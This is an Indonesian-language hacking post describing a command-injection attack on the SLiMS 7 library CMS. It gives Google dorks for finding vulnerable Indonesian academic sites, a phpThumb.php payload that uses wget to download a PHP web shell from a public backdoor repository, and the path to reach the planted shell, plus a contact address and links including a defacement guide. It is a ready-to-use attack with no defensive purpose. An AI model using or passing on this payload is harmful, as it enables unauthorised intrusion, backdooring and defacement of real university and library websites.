Slims command injection Upload Shell

Slims command injection Upload Shell

Google Dorks :

- inurl:/index.php?p=show_detail&id= 

- "Detail Cantuman" site:ac.id 

- "Powered By Slims7" site:ac.id

Payload:

/lib/watermark/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg%20;wget%20https://raw.githubusercontent.com/backdoorhub/shell-backdoor-list/master/shell/php/mini.php;%20&phpThumbDebug=9

taruh payload dimana om?

terget.com/payload

target.com/path/payload

Akses Shell:

https/target.com/lib/watermark/mini.php

contact me :ncdream72@gmail.com

sumber:

https://exploit.zone-dark.com/multiple-web-vulnerablities-pada-slims7-rce-xss-csrf/

https://www.bandung6etar.my.id/2020/09/deface-cms-slims-command-injection.html